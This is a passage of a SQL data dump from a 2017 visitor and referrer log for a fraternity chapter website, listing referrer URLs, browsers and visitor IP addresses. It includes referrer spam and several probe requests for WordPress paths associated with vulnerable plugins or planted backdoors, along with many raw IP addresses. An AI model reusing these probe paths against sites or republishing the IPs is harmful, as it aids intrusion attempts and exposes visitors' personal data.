00',1,0),(5735,'2017-06-12','http://zphiblgz.org','curl','Unknown','7.47.0','','5.61.44.59','000',1,0),(5736,'2017-06-12','http://zphiblgz.org','Firefox','Windows','40.1','','43.225.20.114','000',2,0),(5737,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',1,0),(5738,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',2,0),(5739,'2017-06-12','http://penza.zrus.org/','MSIE','Windows','6.0','','46.118.117.131','000',2,0),(5740,'2017-06-12','http://zphiblgz.org','Firefox','Windows','40.1','','103.55.61.29','000',2,0),(5741,'2017-06-12','https://www.google.com/','Safari','iPhone','602.1','','174.204.15.22','000',1,0),(5742,'2017-06-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','107.178.196.192','000',1,0),(5743,'2017-06-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','107.178.196.194','000',1,0),(5744,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.229.60','000',1,0),(5745,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.195.107.250','000',1,0),(5746,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.191.54','000',1,0),(5747,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(5748,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.13','000',1,0),(5749,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',1,0),(5750,'2017-06-12','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','104.129.204.146','000',3,0),(5751,'2017-06-12','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5752,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.154.251.209','000',3,0),(5753,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.99.13.206','000',2,0),(5754,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.132','000',2,0),(5755,'2017-06-12','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','137.200.32.38','000',2,0),(5756,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.6.12','000',2,0),(5757,'2017-06-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(5758,'2017-06-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(5759,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.37.18','000',1,0),(5760,'2017-06-12','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.169.26','000',5,0),(5761,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(5762,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',1,0),(5763,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.224.40','000',1,0),(5764,'2017-06-12','http://zphiblgz.org/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5765,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',2,0),(5766,'2017-06-12','https://maslenka.kz/','MSIE','Windows','6.0','','37.115.187.118','000',4,0),(5767,'2017-06-12','https://link.ac/','MSIE','Windows','5.5','','46.118.117.131','000',1,0),(5768,'2017-06-12','http://www.japan-bearings.ru/','Unknown','Unknown','Unknown','','46.118.158.86','000',3,0),(5769,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(5770,'2017-06-12','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','109.162.67.12','000',3,0),(5771,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',2,0),(5772,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(5773,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(5774,'2017-06-12','http://vladimir.zrus.org/','MSIE','Windows','6.0','','46.118.123.232','000',3,0),(5775,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',3,0),(5776,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.83.40.239','000',2,0),(5777,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.39.2','000',1,0),(5778,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.2','000',1,0),(5779,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.237.184','000',1,0),(5780,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.12','000',1,0),(5781,'2017-06-12','http://zphiblgz.org','Firefox','Windows','40.1','','189.49.35.199','000',2,0),(5782,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.45','000',2,0),(5783,'2017-06-12','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(5784,'2017-06-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(5785,'2017-06-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.87.185.45','000',1,0),(5786,'2017-06-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(5787,'2017-06-13','http://zphiblgz.org','Firefox','Windows','14.0.1','','5.9.17.118','000',3,0),(5788,'2017-06-13','http://zphiblgz.org','MSIE','Windows','10.0','','5.9.17.118','000',3,0),(5789,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','6.0.4','','5.9.17.118','000',2,0),(5790,'2017-06-13','http://zphiblgz.org','Firefox','Linux','21.0','','5.9.17.118','000',2,0),(5791,'2017-06-13','http://zphiblgz.org','Firefox','Linux','11.0','','5.9.17.118','000',5,0),(5792,'2017-06-13','http://zphiblgz.org','Firefox','Linux','14.0.1','','5.9.17.118','000',3,0),(5793,'2017-06-13','http://zphiblgz.org','Firefox','Windows','19.0','','5.9.17.118','000',1,0),(5794,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','5.1.8','','5.9.17.118','000',1,0),(5795,'2017-06-13','http://zphiblgz.org','Chrome','Macintosh','18.0.1025.166','','5.9.17.118','000',1,0),(5796,'2017-06-13','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.17.118','000',12,0),(5797,'2017-06-13','http://zphiblgz.org','Firefox','Windows','12.0','','5.9.17.118','000',4,0),(5798,'2017-06-13','http://zphiblgz.org','Firefox','Linux','17.0','','5.9.17.118','000',2,0),(5799,'2017-06-13','http://zphiblgz.org','Chrome','Windows','26.0.1410.64','','5.9.17.118','000',1,0),(5800,'2017-06-13','http://zphiblgz.org','Chrome','Windows','27.0.1453.94','','5.9.17.118','000',1,0),(5801,'2017-06-13','http://zphiblgz.org','Chrome','Windows','25.0.1364.169','','5.9.17.118','000',4,0),(5802,'2017-06-13','http://zphiblgz.org','Chrome','Windows','27.0.1453.93','','5.9.17.118','000',2,0),(5803,'2017-06-13','http://zphiblgz.org','Firefox','Windows','11.0','','5.9.17.118','000',4,0),(5804,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','6.0','','5.9.17.118','000',1,0),(5805,'2017-06-13','http://zphiblgz.org','Firefox','Macintosh','21.0','','5.9.17.118','000',4,0),(5806,'2017-06-13','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','5.9.17.118','000',1,0),(5807,'2017-06-13','http://zphiblgz.org','Chrome','Windows','25.0.1364.172','','5.9.17.118','000',1,0),(5808,'2017-06-13','http://zphiblgz.org','Safari','Windows','5.0.2','','5.9.17.118','000',1,0),(5809,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','5.0.2','','5.9.17.118','000',1,0),(5810,'2017-06-13','http://zphiblgz.org','Chrome','Windows','26.0.1410.43','','5.9.17.118','000',2,0),(5811,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','6.0.3','','5.9.17.118','000',1,0),(5812,'2017-06-13','http://zphiblgz.org','Firefox','Windows','16.0','','5.9.17.118','000',1,0),(5813,'2017-06-13','http://zphiblgz.org','Chrome','Windows','23.0.1271.97','','5.9.17.118','000',1,0),(5814,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','5.1.9','','5.9.17.118','000',1,0),(5815,'2017-06-13','http://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','5.9.17.118','000',2,0),(5816,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','5.1','','5.9.17.118','000',1,0),(5817,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','6.0.2','','5.9.17.118','000',1,0),(5818,'2017-06-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','62.210.103.72','000',2,0),(5819,'2017-06-13','http://www.pechikamini.ru/','MSIE','Windows','6.0','','46.118.117.131','000',2,0),(5820,'2017-06-13','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.145','000',1,0),(5821,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',4,0),(5822,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.249.145.164','000',1,0),(5823,'2017-06-13','https://vpnmouse.com/','MSIE','Windows','6.0','','46.118.158.86','000',5,0),(5824,'2017-06-13','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','74.208.150.202','000',12,0),(5825,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(5826,'2017-06-13','http://mebel-vstroika.ru/','Opera','Windows','7.60','','178.137.4.41','000',2,0),(5827,'2017-06-13','http://zphiblgz.org','AppleWebKit','iPhone','603.2.4','','107.77.241.10','000',8,0),(5828,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',2,0),(5829,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','86.110.117.165','000',1,0),(5830,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(5831,'2017-06-13','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','146.185.144.64','000',1,0),(5832,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.190.34','000',1,0),(5833,'2017-06-13','http://kemerovo.zrus.org/','Opera','Windows','8.01','','37.115.187.118','000',1,0),(5834,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',2,0),(5835,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(5836,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','196.54.55.19','000',1,0),(5837,'2017-06-13','http://zphiblgz.org','Firefox','Windows','40.1','','178.221.64.163','000',2,0),(5838,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','139.162.16.13','000',1,0),(5839,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.43','000',1,0),(5840,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.148.26.108','000',1,0),(5841,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(5842,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',1,0),(5843,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(5844,'2017-06-13','https://www.google.com/','Chrome','Windows','58.0.3029.110','','149.101.1.118','000',1,0),(5845,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.7','000',1,0),(5846,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.229','000',1,0),(5847,'2017-06-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(5848,'2017-06-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(5849,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(5850,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(5851,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','87.118.116.12','000',1,0),(5852,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.58.100.98','000',1,0),(5853,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.204.54','000',2,0),(5854,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',2,0),(5855,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.5','000',1,0),(5856,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.53.134','000',1,0),(5857,'2017-06-13','https://landscaping.center/','MSIE','Windows','6.0','','37.115.187.118','000',1,0),(5858,'2017-06-13','http://zphiblgz.org','Firefox','Windows','40.1','','185.115.103.218','000',2,0),(5859,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.60','000',1,0),(5860,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(5861,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.187.150.12','000',1,0),(5862,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','211.104.154.7','000',1,0),(5863,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.9','000',1,0),(5864,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.32.53.53','000',1,0),(5865,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(5866,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.53.94','000',1,0),(5867,'2017-06-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.117.215.9','000',1,0),(5868,'2017-06-13','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(5869,'2017-06-13','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.11.148','000',3,0),(5870,'2017-06-13','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.11.148','000',3,0),(5871,'2017-06-13','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.11.148','000',1,0),(5872,'2017-06-13','http://zphiblgz.org','Firefox','Macintosh','29.0','','138.197.11.148','000',1,0),(5873,'2017-06-13','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.11.148','000',1,0),(5874,'2017-06-13','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.11.148','000',1,0),(5875,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.8','000',4,0),(5876,'2017-06-13','http://ryazan.zrus.org/','MSIE','Windows','7.0b','','46.118.117.131','000',3,0),(5877,'2017-06-13','http://zphiblgz.org','Firefox','Windows','40.1','','189.79.7.221','000',2,0),(5878,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(5879,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.105.114','000',1,0),(5880,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',2,0),(5881,'2017-06-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',2,0),(5882,'2017-06-13','http://zphiblgz.org','Firefox','Windows','40.1','','156.205.2.58','000',2,0),(5883,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.213.8.84','000',1,0),(5884,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(5885,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',2,0),(5886,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.129.62.62','000',1,0),(5887,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(5888,'2017-06-14','http://rostov.zrus.org/','Opera','Windows','9.01','','46.118.123.232','000',1,0),(5889,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.248.166.157','000',2,0),(5890,'2017-06-14','http://zphiblgz.org','Firefox','Windows','40.1','','191.183.100.203','000',2,0),(5891,'2017-06-14','http://coinsspb.com/','MSIE','Windows','6.0','','46.118.117.131','000',5,0),(5892,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.11.147','000',1,0),(5893,'2017-06-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.254.238.44','000',1,0),(5894,'2017-06-14','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','109.162.67.12','000',3,0),(5895,'2017-06-14','http://zphiblgz.org/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',2,0),(5896,'2017-06-14','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(5897,'2017-06-14','http://zphiblgz.org/wp-admin/','Firefox','Windows','3.5.0','','173.208.129.58','000',4,0),(5898,'2017-06-14','http://zphiblgz.org','MSIE','Windows','9.0','','173.208.129.58','000',2,0),(5899,'2017-06-14','http://google.com','Chrome','Macintosh','33.0.1750.152','','104.154.236.151','000',1,0),(5900,'2017-06-14','http://zphiblgz.org/wp-admin/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(5901,'2017-06-14','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/db-update.php','Chrome','Windows','5.0.375.99','','89.253.234.57','000',1,0),(5902,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(5903,'2017-06-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.134.232.58','000',1,0),(5904,'2017-06-14','http://kursk.zrus.org/','MSIE','Windows','6.0','','37.115.187.118','000',4,0),(5905,'2017-06-14','http://zphiblgz.org','Firefox','Windows','52.0','','119.71.163.108','000',1,0),(5906,'2017-06-14','http://google.com','Chrome','Macintosh','33.0.1750.152','','35.192.9.7','000',1,0),(5907,'2017-06-14','http://kazan.zrus.org/','MSIE','Windows','6.0','','46.118.123.232','000',4,0),(5908,'2017-06-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(5909,'2017-06-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(5910,'2017-06-14','http://elvel.com.ua/girobordy','Unknown','Unknown','Unknown','','46.118.117.131','000',2,0),(5911,'2017-06-14','http://barnaul.zrus.org/','MSIE','Unknown','6.0','','46.118.123.232','000',4,0),(5912,'2017-06-14','http://zphiblgz.org/','Chrome','Windows','57.0.2987.110','','146.185.223.122','000',1,0),(5913,'2017-06-14','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.6','000',5,0),(5914,'2017-06-14','http://zphiblgz.org','Firefox','Windows','40.1','','120.28.191.12','000',1,0),(5915,'2017-06-14','http://zphiblgz.org','Firefox','Windows','40.1','','120.28.191.11','000',1,0),(5916,'2017-06-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.71','000',1,0),(5917,'2017-06-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','141.170.2.53','000',1,0),(5918,'2017-06-14','http://zphiblgz.org/wp-content/plugins/onten/onten.php','Chrome','Windows','5.0.375.99','','94.231.103.26','000',1,0),(5919,'2017-06-14','http://chatroulette.world/','MSIE','Windows','6.0','','46.118.158.86','000',2,0),(5920,'2017-06-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5921,'2017-06-14','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/user-info.php','Chrome','Windows','5.0.375.99','','46.45.143.35','000',1,0),(5922,'2017-06-14','http://zphiblgz.org','Firefox','Windows','40.1','','131.0.128.68','000',2,0),(5923,'2017-06-14','https://dellalimov.com/','Opera','Windows','8.01','','37.115.187.118','000',2,0),(5924,'2017-06-14','http://zphiblgz.org/c0nfig.php','Chrome','Windows','5.0.375.99','','192.185.82.118','000',1,0),(5925,'2017-06-14','http://www.zphibmaryland.org/chapters/','Chrome','iPhone','59.0.3071.84','','68.134.102.104','000',7,0),(5926,'2017-06-14','http://hdwallpapers-free.com/','Unknown','Unknown','Unknown','','178.137.4.41','000',2,0),(5927,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','178.174.157.212','000',1,0),(5928,'2017-06-15','http://zphiblgz.org/','Firefox','Windows','3.6.28','','37.230.212.46','000',1,0),(5929,'2017-06-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.66','000',1,0),(5930,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(5931,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','177.52.120.129','000',2,0),(5932,'2017-06-15','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','180.87.230.29','000',1,0),(5933,'2017-06-15','http://perm-profnastil.ru/','MSIE','Windows','6.0','','46.118.158.86','000',2,0),(5934,'2017-06-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(5935,'2017-06-15','http://zphiblgz.org','Firefox','Windows','18.0','','42.96.149.69','000',1,0),(5936,'2017-06-15','http://zphiblgz.org','MSIE','Windows','9.0','','42.96.149.69','000',2,0),(5937,'2017-06-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','42.96.149.69','000',6,0),(5938,'2017-06-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(5939,'2017-06-15','http://zphiblgz.org','Chrome','Windows','43.0.2357.81','','38.140.157.84','000',2,0),(5940,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(5941,'2017-06-15','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(5942,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','37.25.8.150','000',2,0),(5943,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.196','000',1,0),(5944,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','204.110.13.94','000',2,0),(5945,'2017-06-15','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(5946,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','156.208.229.38','000',1,0),(5947,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','94.189.205.123','000',1,0),(5948,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','2.83.65.136','000',1,0),(5949,'2017-06-15','http://simferopol.zrus.org/','Opera','Windows','7.02','','46.119.116.109','000',1,0),(5950,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','87.243.105.245','000',1,0),(5951,'2017-06-15','https://www.google.com/','Firefox','Windows','52.0','','143.85.96.18','000',1,0),(5952,'2017-06-15','http://zphiblgz.org','Firefox','Windows','40.1','','89.177.169.89','000',2,0),(5953,'2017-06-15','https://vpnmouse.com/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(5954,'2017-06-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',12,0),(5955,'2017-06-15','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(5956,'2017-06-15','http://zphiblgz.org','Firefox','Windows','45.0','','144.217.167.240','000',1,0),(5957,'2017-06-15','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php','Chrome','Windows','5.0.375.99','','122.155.9.136','000',1,0),(5958,'2017-06-15','http://www.timer4web.com/domain/zphiblgz.org','Chrome','Macintosh','5.0.375.86','','46.4.77.209','000',1,0),(5959,'2017-06-15','http://zphiblgz.org/wp-content/plugins/paypal-donation-button/paypal-donation-button.php','Chrome','Windows','5.0.375.99','','176.9.31.154','000',1,0),(5960,'2017-06-15','http://kozhniebolezni.com/','MSIE','Windows','2.0','','46.118.125.174','000',2,0),(5961,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.105.100.149','000',2,0),(5962,'2017-06-15','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(5963,'2017-06-15','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','202.46.58.133','000',1,0),(5964,'2017-06-15','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',1,0),(5965,'2017-06-15','http://zphiblgz.org/wp-content/themes/twentyeleven/wp-ajax.php','Chrome','Windows','5.0.375.99','','192.185.2.182','000',1,0),(5966,'2017-06-15','http://zphiblgz.org/wp-admin/network/etc.php','Chrome','Windows','5.0.375.99','','213.251.182.106','000',1,0),(5967,'2017-06-15','http://zphiblgz.org/wp-admin/logo_img.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(5968,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',1,0),(5969,'2017-06-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',1,0),(5970,'2017-06-16','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.141.31','000',1,0),(5971,'2017-06-16','http://zphiblgz.org/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php','Chrome','Windows','5.0.375.99','','5.196.92.196','000',1,0),(5972,'2017-06-16','http://www.zphiblgz.org/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','Chrome','Windows','42.0.2311.152','','216.244.86.114','000',1,0),(5973,'2017-06-16','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',4,0),(5974,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','95.251.163.43','000',1,0),(5975,'2017-06-16','http://google.com','Chrome','Macintosh','33.0.1750.152','','104.154.134.123','000',1,0),(5976,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','79.79.50.93','000',1,0),(5977,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','42.104.98.98','000',2,0),(5978,'2017-06-16','http://zphiblgz.org/models.php','Chrome','Windows','5.0.375.99','','198.38.90.32','000',1,0),(5979,'2017-06-16','http://anapa.zrus.org/','MSIE','Windows','5.5','','46.119.116.109','000',3,0),(5980,'2017-06-16','http://zphiblgz.org','MSIE','Windows','10.0','','45.55.253.153','000',2,0),(5981,'2017-06-16','http://zphiblgz.org','MSIE','Windows','9.0','','45.55.253.153','000',3,0),(5982,'2017-06-16','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','45.55.253.153','000',2,0),(5983,'2017-06-16','http://zphiblgz.org','Firefox','Windows','28.0','','45.55.253.153','000',2,0),(5984,'2017-06-16','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','45.55.253.153','000',1,0),(5985,'2017-06-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','208.113.162.107','000',6,0),(5986,'2017-06-16','http://zphiblgz.org','Firefox','Windows','29.0','','138.197.7.112','000',1,0),(5987,'2017-06-16','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','138.197.7.112','000',3,0),(5988,'2017-06-16','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.7.112','000',2,0),(5989,'2017-06-16','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.7.112','000',1,0),(5990,'2017-06-16','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.7.112','000',1,0),(5991,'2017-06-16','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','138.197.7.112','000',1,0),(5992,'2017-06-16','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.7.112','000',1,0),(5993,'2017-06-16','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.111.27','000',1,0),(5994,'2017-06-16','http://zphiblgz.org','Firefox','Windows','14.0.1','','5.9.106.81','000',1,0),(5995,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','85.94.138.156','000',2,0),(5996,'2017-06-16','https://www.google.com/','Chrome','Windows','59.0.3071.86','','167.102.228.16','000',3,0),(5997,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','213.230.79.225','000',2,0),(5998,'2017-06-16','http://zphiblgz.org','Firefox','Windows','40.1','','46.193.0.82','000',1,0),(5999,'2017-06-16','http://zphiblgz.org/wp-forms-ajax.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(6000,'2017-06-16','http://chatroulette.online/','MSIE','Unknown','6.0','','46.118.124.89','000',2,0),(6001,'2017-06-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','166.70.207.2','000',1,0),(6002,'2017-06-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(6003,'2017-06-16','http://murmansk.zrus.org/','Opera','Windows','8.50','','46.118.125.174','000',3,0),(6004,'2017-06-16','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(6005,'2017-06-16','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','209.200.35.222','000',1,0),(6006,'2017-06-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',3,0),(6007,'2017-06-16','http://www.zphiblgz.org','MSIE','Windows','9.0